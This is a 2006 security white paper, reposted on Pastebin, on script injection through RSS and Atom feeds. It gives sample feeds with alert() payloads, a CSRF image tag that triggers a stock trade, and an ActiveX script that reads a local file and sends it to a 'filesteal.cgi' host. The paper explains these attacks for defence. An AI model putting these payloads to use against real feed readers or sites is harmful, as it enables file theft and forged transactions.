Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Start Secure. Stay Secure.™
- Feed Injection in Web 2.0
- Hacking RSS and Atom Feed Implementations
- By Robert Auger, SPI Labs
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- ii
- Feed Injection in Web 2.0
- Table of Contents
- INTRODUCTION................................................................................. 3
- WEB FEEDS AS ATTACK VECTORS ...................................................... 4
- Readers treating <> as literals.................................................................. 4
- Readers converting the HTML entities to their true values.............................. 5
- Readers stripping out < > < and > during display ................................. 6
- RISKS BY ZONE ................................................................................. 7
- Remote Zone Risks.................................................................................. 7
- Local Zone Risks ..................................................................................... 8
- READER TYPE-SPECIFIC RISKS........................................................ 11
- Web Reader Risks...................................................................................11
- Web Site Risks.......................................................................................11
- USING A FEED AS A DEPLOYMENT VECTOR...................................... 12
- How Does One Utilize a Web Feed Vulnerability? .........................................12
- RISKS BY STANDARD....................................................................... 13
- RSS......................................................................................................13
- Atom ....................................................................................................13
- CONCLUSION................................................................................... 14
- REFERENCES AND ADDITIONAL READING....................................... 16
- ABOUT SPI LABS.............................................................................. 18
- ABOUT S.P.I. DYNAMICS INCORPORATED ....................................... 19
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 3
- Feed Injection in Web 2.0
- Introduction
- One new feature of "Web 2.0", the movement to build a more responsive
- Web, is the utilization of XML content feeds which use the RSS and Atom
- standards. These feeds allow both users and Web sites to obtain content
- headlines and body text without needing to visit the site in question,
- basically providing users with a summary of that sites content. Unfortunately,
- many of the applications that receive this data do not consider the security
- implications of using content from third parties and unknowingly make
- themselves and their attached systems susceptible to various forms of
- attack.
- This white paper discusses various forms of attacks based on Web feeds that
- follow the RSS, Atom and XML standards. This paper does not extensively
- cover each XML element and its usage within Web-based feeds, nor does it
- address other vulnerability scenarios such as buffer overflows and other XML-
- specific risks. The goal of this paper is to outline the risks of lesser-known
- threats which are currently emerging on the Web utilizing Cross-Site
- Scripting.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 4
- Feed Injection in Web 2.0
- Web Feeds as Attack Vectors
- Browsers, local readers, Web sites and online portals such as Bloglines all
- subscribe to feeds. These applications automatically fetch new content at
- intervals defined either on the receiving client or by the feed itself. Once a
- user is subscribed, they are alerted to new entries where they can read the
- story title and usually a brief description of the story body. The RSS
- Specification states that story bodies (the <description> tag) allow HTML
- entities in order to allow HTML formatting, but it isn't 100% clear about the
- use of literal HTML tag inclusions. Our research of several Web feed readers
- revealed different approaches to treating feed input and passing content to
- users.
- Readers treating <> as literals
- A vast majority of the readers tested utilized IE components to display the
- data. In certain instances when a feed contained HTML tags, the viewer
- application served up the content literally. Below is an RSS 2.0 example of
- such a feed which has been simplified to only the relevant tags.
- <?xml version="1.0" encoding="ISO-8859-1"?> <rss version="2.0"> <channel>
- <title> <script>alert('Channel Title')</script>
- </title>
- <link>http://www.mycoolsite.com/
- </link>
- <description> <script>alert('Channel Description')</script> </description>
- <language>en-us
- </language>
- <copyright>Mr Cool 2006</copyright>
- <pubDate>Thu, 22 Jun 2006 11:09:23 EDT</pubDate> <ttl>10</ttl> <image>
- <title> <script>alert('Channel Image Title')</script>
- </title>
- <link>http://www.mycoolsite.com/</link>
- <url>http://www.mycoolsite.com/logo.gif</url>
- <width>144</width>
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 5
- Feed Injection in Web 2.0
- <height>33</height>
- <description> <script>alert('Channel Image Description')</script> </description>
- </image>
- <item>
- <title> <script>alert('Item Title')</script> </title>
- <link>http://www.mycoolsite.com/lonely.html</link>
- <description> <script>alert('Item Description')</script> </description>
- <pubDate>Thu, 22 Jun 2006 11:08:14 EDT</pubDate> <guid>http://mysite/Mrguid</guid>
- </item>
- </channel>
- </rss>
- Multiple instances of script injection appear in this example. During the
- presentation phase the readers treat the data as a literal and thus execute
- any script contained in the feed, in this case JavaScript. This could be used to
- install malicious software on the client system, steal cookies, or for a wide
- range of nefarious purposes.
- Readers converting the HTML entities to their true values
- Most of the time, developers implemented the standard XML specification for
- their Web-based readers and converted HTML entities to their real values.
- Unfortunately, when they displayed this converted data they did not take into
- account the potential for script injection. This example uses an RSS 2.0 feed:
- <?xml version="1.0" encoding="ISO-8859-1"?>
- <rss version="2.0">
- <channel>
- <title> <script>alert('Channel Title')</script> </title>
- <link>http://www.mycoolsite.com/</link>
- <description> <script>alert('Channel Description')</script>
- </description>
- <language>en-us</language>
- <copyright>Mr Cool 2006</copyright>
- <pubDate>Thu, 22 Jun 2006 11:09:23 EDT</pubDate>
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 6
- Feed Injection in Web 2.0
- <ttl>10</ttl>
- <image>
- <title> <script>alert('Channel Image Title')</script> </title>
- <link>http://www.mycoolsite.com/</link>
- <url>http://www.mycoolsite.com/logo.gif</url>
- <width>144</width>
- <height>33</height>
- <description> <script>alert('Channel Image Description')</script>
- </description>
- </image>
- <item>
- <title> <script>alert('Item Title')</script> </title>
- <link>http://www.mycoolsite.com/lonely.html</link>
- <description> <script>alert('Item Description')</script> </description>
- <pubDate>Thu, 22 Jun 2006 11:08:14 EDT</pubDate>
- <guid>http://mysite/Mrguid</guid>
- </item>
- </channel>
- </rss>
- Typically these RSS viewers converted < to < and > to > and then put
- that content into the content viewer (typically a browser component) which
- allowed for script execution. The vast majority of these readers converted
- the feed content and saved it to a file on the hard disk before loading it into
- the viewer. This opened up the local zone as detailed in the Local Zone Risks
- section later in this document.
- Readers stripping out < > < and > during display
- The safest readers were not affected because they stripped out both HTML
- entities and metacharacters before displaying the information to the user.
- Interestingly, readers supporting both RSS and Atom technologies had
- properly stripped them in one technology but not the other, and were
- therefore still vulnerable.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 7
- Feed Injection in Web 2.0
- If you are familiar with Cross-Site Scripting attacks you may be familiar with
- some of the things you can do with script injection. However, you may not
- see all of the implications regarding Web feed readers.
- Risks by Zone
- Remote Zone Risks
- Typically Web browsers and Web-based readers fall into the remote zone
- category. When a reader is vulnerable in the remote zone attackers are
- substantially limited in what they can do. However, there is still a potential
- for successful attacks.
- Cross-Site Request Forgery
- An attacker can utilize Cross-Site Request Forgery (CSRF or XSRF) attacks in
- various ways to make your machine send requests to a Web site in order to
- possibly execute commands. For example:
- <img
- src="http://www.mystocktradersite.com/transaction.asp?sell=google&buy=Microsoft&nums
- hares=1000">
- In the fictitious example above an attacker could inject an "<img src>" tag
- into a feed to make a system connect to a stock trading site named
- "www.mystocktradersite.com" to sell some stocks and buy others. Additional
- information on Cross-Site Request Forgery can be found in the References
- and Additional Reading section.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 8
- Feed Injection in Web 2.0
- Potential to launch attacks
- Since attackers can send requests to other sites, they could potentially trick
- your browser into carrying out Web-based attacks on their behalf. These
- attacks could cause Denial of Service conditions in the remote site, or if the
- site is vulnerable, execute commands on it. Here an attacker's advantage is
- that your IP will be logged and any resulting investigation by the victim may
- lead to you instead of to the attacker.
- POST data and spam
- Many Web applications utilize common Web libraries such as Perl's CGI.PM
- module for various functions including parameter fetching. Some of these
- libraries allow the developer to simply say "give me this parameter" without
- specifying if the request came into the application as POST data or GET. This
- means that if an attacker wanted to attack a remote machine's application
- and that application utilized POST, then it may be possible to convert these
- requests to GET and still be successful. Depending on the number of
- vulnerable subscribers, an attacker could exploit this "feature" and use
- thousands of victims to spam a particular site via submissions from Web
- forms.
- Local Zone Risks
- The readers which made users vulnerable to local zone attacks typically
- converted the feed to an HTML file, stored it to a local file and loaded it into
- an Internet Explorer instance. By loading the file from the disk they opened
- themselves to the local browser zone and its functionality. This functionality
- includes access to ActiveX objects with permissions to read and write files to
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 9
- Feed Injection in Web 2.0
- the disk. The following simple example script below will read in a local file
- "c:\test.txt" and send a copy of it to a third party host.
- <script>
- txtFile="";theFile="C:\\test.txt";
- var thisFile = new ActiveXObject("Scripting.FileSystemObject");
- var ReadThisFile = thisFile.OpenTextFile(theFile,1,true);
- txtFile+= ReadThisFile.ReadAll();
- ReadThisFile.Close(); alert(txtFile);
- document.location='http://host/cgi-bin/filesteal.cgi?' + txtFile
- </script>
- When viewing the feed, the user is often immediately presented with an
- ActiveX warning asking if they wish to allow the script to execute before
- being able to see any of the content. Of course, savvy users will click No, but
- if most people were savvy in this way, we would not still have e-mail
- attachment viruses! We discovered a large percentage of local readers were
- in fact affected by this problem. Worse yet, some did not even warn the user
- before executing the ActiveX control.
- Besides the ability to access the file system and perform most of the attacks
- outlined in the Remote Zone Risks section, local zone access opens up other
- opportunities such as access to the "XMLHttp/XMLHttpRequest" object
- typically utilized by Ajax applications.This object is commonly limited to
- sending requests only to the same domain containing the code from which it
- came (in the remote zone). However, when in the local zone there is not a
- limit as to what can be requested. This allows an attacker to include code in
- a feed to scan the ports of a backend network, identifying open ports and
- potentially launching attacks automatically while behind the firewall without
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 10
- Feed Injection in Web 2.0
- the user's knowledge. The potential for a worm is fairly obvious. The example
- below demonstrates sending a request to a remote host.
- <script>
- var post_data = 'name=value';
- var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
- xmlhttp.open("POST", 'http://attackedhost/foo/bar.php', true);
- xmlhttp.onreadystatechange = function () {
- if (xmlhttp.readyState == 4) {
- alert(xmlhttp.responseText);
- }
- };
- xmlhttp.send(post_data);
- </script>
- Additional presentations by Jeremiah Grossman provide examples of
- keystroke recording and direct attacker interaction with the user host and
- can be found in the References and Additional Reading section.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 11
- Feed Injection in Web 2.0
- Reader Type-Specific Risks
- Web Reader Risks
- People typically use browsers or local clients to subscribe to a Web-based
- feed. They are affected by both local and remote zone issues depending on
- the application's implementation. Online sites such as bloglines.com or
- Google provide Web-based feed viewers and fall into the remote zone risk
- category. Vulnerabilities in Web-based viewers grant attackers access to the
- site's zone (allowing cookie theft) and to common abilities often available for
- Cross-Site Scripting attacks.
- Web Site Risks
- The potential impact of a feed-based attack increases significantly when the
- feed being controlled is syndicated on other Web sites. For example, if an
- attacker-controlled feed was created on Site A and implemented on Site B,
- its content would be included in Site B's content. If Site B were also
- vulnerable to a Web feed attack, the attacker could then access Site B's
- remote zone and users. In some cases an attacker-controlled feed is included
- in feeds to other sites and also to users who in turn pass it elsewhere, rapidly
- expanding the base of possible victims.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 12
- Feed Injection in Web 2.0
- Using a Feed as a Deployment Vector
- In addition to the issues described above, the potential for using Web-based
- feeds as an exploit deployment vector for both known and zero-day exploits
- is rather large. This is even more apparent when a feed is re-syndicated in
- other sites' feeds. The potential exposed user base could be in the millions,
- making it an attractive method for worm deployment.
- How Does One Utilize a Web Feed Vulnerability?
- Vulnerabilities in Web feed clients can be utilized if:
- • The feed owner is malicious. This will not be the case in most
- situations, but is a possibility.
- • The site providing the feed was hacked. Defacement archives show
- thousands of sites being defaced daily. An attacker deciding to inject
- malicious payloads into a feed rather than deface the site has a
- greater chance of evading detection for a longer period of time, and
- thus to affect more machines.
- • Some Web-based feeds are often created from mailing lists, bulletin
- board messages, peer-to-peer (P2P) Web sites, BitTorrent sites or user
- postings on blogs. This provides a convenient method to inject a
- malicious payload.
- • The feed is somehow modified during the transport phase via Proxy
- Cache poisoning. While worth mentioning, the likelihood of this is slim.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 13
- Feed Injection in Web 2.0
- Risks by Standard
- RSS
- The most typical vulnerabilities in RSS-based readers were within the Feed
- Title, Feed Description, Item Title, Item Link and Item Description XML
- elements, though others can also be affected. In order to utilize these fields,
- attackers need only to insert their malicious payloads into them. Depending
- on the vulnerable reader, attackers may need to insert literal script injection,
- HTML entity injection, or a combination of the two. The following is a
- harmless example showing script injection using various methods in a story
- entry.
- <title><script>alert('Title Popup Example ')</script> </title>
- <link><script>alert('Link Popup Example')</script> </link>
- <description><script>alert('Description Popup Example')</script></description>
- </item>
- A vulnerable reader will attempt to display data within these fields and
- execute the script.
- Atom
- Similar to the issues discovered in RSS, Atom is affected in the equivalent
- fields in a large majority of affected applications. Common elements include
- the Author Name, Entry Updated Element, Feed Title, Feed Subtitle, Feed
- Updated Element, and Div elements as well as many others. The following is
- a harmless example showing script injection into an Atom story entry.
- <entry xmlns="http://www.w3.org/2005/Atom">
- <author>
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 14
- Feed Injection in Web 2.0
- <name> <script>alert('Entry Author')</script> </name>
- </author>
- <published> <script>alert('Entry Published')</script> </published>
- <updated> <script>alert('Entry Updated')</script> </updated>
- <link href="http://site/" rel="alternate" title="Site's Feed" type="text/html"/>
- <id> <script>alert('Entry ID')</script> </id>
- <title type="html"><script>alert('Entry Title')</script></title>
- <content type="xhtml" xml:base="http://site/" xml:space="preserve">
- <div xmlns="http://www.w3.org/1999/xhtml">
- <script>alert('Entry Div XMLNS')</script>
- </div>
- </content>
- <draft xmlns="http://purl.org/atom-blog/ns#">false</draft>
- </entry>
- Conclusion
- Instead of focusing attacks on the server side, attackers have also begun
- active exploitation of client side vulnerabilities. This trend isn't expected to
- slow down anytime soon. Client-side vulnerabilities allow an attacker to
- execute payloads and extract information without the need to install any
- software, creating less overhead for the attacker. Web based feeds are
- quickly gaining in popularity and have been widely adopted as a mechanism
- for software and firmware updates. Vulnerabilities associated with feeds
- include Cross-Site Scripting, which continues to become a more interesting
- and dangerous attack vector with each passing month. Other risks, including
- keystroke logging and Cross-Site Request Forgery, are also on the rise.
- How can Web sites that provide feeds help to prevent security issues that
- arise from Feed Injection? Application developers can make a start by “white
- listing” certain HTML Tags such as <b>, <br>, and <font>. White listing
- refers to the practice of accepting input that is good, as opposed to trying to
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 15
- Feed Injection in Web 2.0
- block input that is bad. Developers can also strip possibly malicious tags such
- as “<” and “>”. Although that will prevent the issues that have been
- discovered and discussed in this white paper, that approach will also have
- the unfortunate downside of possibly removing functionality and the ability to
- utilize HTML formatting. End-users can help to protect themselves by
- disabling script, applet, and plug-in execution, although that would tend to
- limit functionality.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 16
- Feed Injection in Web 2.0
- References and Additional Reading
- What is Web 2.0?
- http://www.oreillynet.com/pub/a/oreilly/tim/news/2005/09/30/what-is-
- web-20.html?page=3
- Wikipedia RSS Entry
- http://en.wikipedia.org/wiki/RSS_(file_format)
- Wikipedia List of Content Syndication Markup Languages
- http://en.wikipedia.org/wiki/List_of_content_syndication_markup_languag
- es
- XML Specification
- http://www.w3.org/TR/REC-xml/
- RSS Specification
- http://www.rss-specifications.com/rss-specifications.htm
- Atom Specification
- http://www.atomenabled.org/
- Cross-Site Request Forgery
- http://en.wikipedia.org/wiki/Cross-site_request_forgery
- Cross-Zone Scripting
- http://en.wikipedia.org/wiki/Cross_Zone_Scripting
- The Cross-Site Scripting FAQ
- http://www.cgisecurity.com/articles/xss-faq.shtml
- Ajax
- http://en.wikipedia.org/wiki/AJAX
- Yahoo Ajax Worm
- http://www.macworld.com/news/2006/06/16/ajax/index.php
- Yahoo RSS Vulnerability
- http://seclists.org/lists/bugtraq/2005/Oct/0205.html
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 17
- Feed Injection in Web 2.0
- Phishing with Superbait
- http://www.whitehatsec.com/presentations/phishing_superbait.pdf
- Web Browser Customization
- http://msdn.microsoft.com/workshop/browser/hosting/wbcustomization.asp
- RSS 2.0 Best Practice Tip: Entity-encoded HTML in Descriptions
- http://myst-
- technology.com/mysmartchannels/public/item/11878?model=user/mtp/web&sty
- le=user/mtp/web
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 18
- Feed Injection in Web 2.0
- About SPI Labs
- SPI Labs is the dedicated application security research and testing team of
- S.P.I. Dynamics. Composed of some of the industry’s top security experts,
- SPI Labs is specifically focused on researching security vulnerabilities at the
- Web application layer. The SPI Labs mission is to provide objective research
- to the security community and give organizations concerned with their
- security practices a method of detecting, remediating, and preventing attacks
- upon the Web application layer.
- SPI Labs industry leading security expertise is evidenced via continuous
- support of a combination of assessment methodologies which are used in
- tandem to produce the most accurate Web application vulnerability
- assessments available on the market. This direct research is utilized to
- provide daily updates to S.P.I. Dynamics’ suite of security assessment and
- testing software products. These updates include new intelligent engines
- capable of dynamically assessing Web applications for security vulnerabilities
- by crafting highly accurate attacks unique to each application and situation,
- and daily additions to the world’s largest database of more than 5,000
- application layer vulnerability detection signatures and agents. SPI Labs
- engineers comply with the standards proposed by the Internet Engineering
- Task Force (IETF) for responsible security vulnerability disclosure.
- Information regarding SPI Labs policies and procedures for disclosure are
- outlined on the S.P.I. Dynamics Web site at: http://www.spidynamics.com/spilabs/.
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 19
- Feed Injection in Web 2.0
- About the Author
- Robert Auger is a research and development engineer for SPI Dynamics
- (www.spidynamics.com) where he is responsible for researching Internet
- security advisories, competitive products/services and vulnerabilities at the
- application layer. In addition, he is a member of the SPI Labs team, where he
- develops new methods for penetration (pen) testing and new Web application
- security techniques. Robert is considered an expert in Web application
- security due to his extensive knowledge and experience in this specific
- Internet security niche. Robert also co-founded the Web Application Security
- Consortium (WASC) in 2004, and leads the WASC-Articles project. He has
- also served as a technical advisor to the media, working on stories related to
- his area of expertise.
- About S.P.I. Dynamics Incorporated
- Start Secure. Stay Secure.
- Security Assurance Throughout the Application Lifecycle.
- S.P.I. Dynamics’ suite of Web application security products help
- organizations build and maintain secure Web applications, preventing attacks
- that would otherwise go undetected by today’s traditional corporate Internet
- security measures. The company’s products enable all phases of the software
- development lifecycle to collaborate in order to build, test and deploy secure
- Web applications. In addition, the security assurance provided by these
- products help Fortune 500 companies and organizations in regulated
- industries — including financial services, health care and government —
- Start Secure. Stay Secure.™
- © 2006 SPI Dynamics, Inc. All Rights Reserved.
- No reproduction or redistribution without written permission.
- 20
- Feed Injection in Web 2.0
- protect their sensitive data and comply with legal mandates and regulations
- regarding privacy and information security. Founded in 2000 by security
- specialists, S.P.I. Dynamics is privately held with headquarters in Atlanta,
- Georgia.
- Contact Information
- S.P.I. Dynamics Telephone: (678) 781-4800
- 115 Perimeter Center Place Fax: (678) 781-4850
- Suite 1100 Email: info@spidynamics.com
- Atlanta, GA 30346 Web: www.spidynamics.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement